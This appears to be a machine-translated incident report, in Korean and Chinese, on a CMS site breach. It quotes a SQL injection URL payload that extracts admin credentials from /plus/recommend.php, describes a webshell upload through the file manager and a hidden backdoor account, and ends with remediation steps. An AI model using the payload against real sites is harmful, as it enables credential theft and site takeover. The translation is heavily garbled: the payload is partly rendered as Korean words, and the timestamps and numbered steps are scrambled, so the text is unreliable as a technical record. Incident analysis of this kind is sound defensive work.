감사 로그에서 시작 (상태 코드 200) 발견 페이로드 SQL 인젝션
페이로드 SQL 인젝션의 존재를 결정하기 위해 사이트의 사용을 확인하고 공격자는 계정과 암호를 다시 얻을 수있는 취약점을 악용
주입 지점 : http : //192.168.31.35/plus/recommend.php? action = & aid = 1 & _FILES [type] [tmp_name] =
유효 탑재량:
http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//* ! 50000select * / 1,2,3 (%의 20CONCAT (0x7c, 사용자 ID, 0x7c, PWD 선택) + + '% 23 %의 @__ admin` 20limit + 0.1)에서, 23 % 5,6,7,8,9 @ '\ % 27` + & _ FILES [입력] [이름] = 1.JPG 및 _FILES [입력] [타입 = 어플리케이션 / 옥텟 스트림 _FILES [입력] [크기 = 4294
공격자
[15 : 50 : / 월 / 27 2,019 07 0,800] 내지
15 : 50 : / 월 / 2019 27 09 0800]
전도 백그라운드 검색
그리고 발견 존재하는 로그 파일 업로드 취약점을보고
URL : /dede/file_manage_main.php activepath = / 업로드
다음은 공격자가 임의의 파일 업로드 취약점을 성공적으로 업로드 PHP 말레이시아가
이 숨겨진 계정을 발견하고 떠나는 5 회 교대 뒷문을
재활 프로그램 :
1, 후면 도어를 제거합니다
2, 파일 업로드 제한 글로벌 최적화, 대신 화이트리스트를 업로드
4 에 대한 URL의 트랜스 코딩 컴파일러
5、增强密码难度,使用更安全的加密手段
6、在代码层面进行优化,严格判断文件及变量参数的引入,防止未知文件被包含产生威胁
升级cms版本、mysql版本、
升级优化之后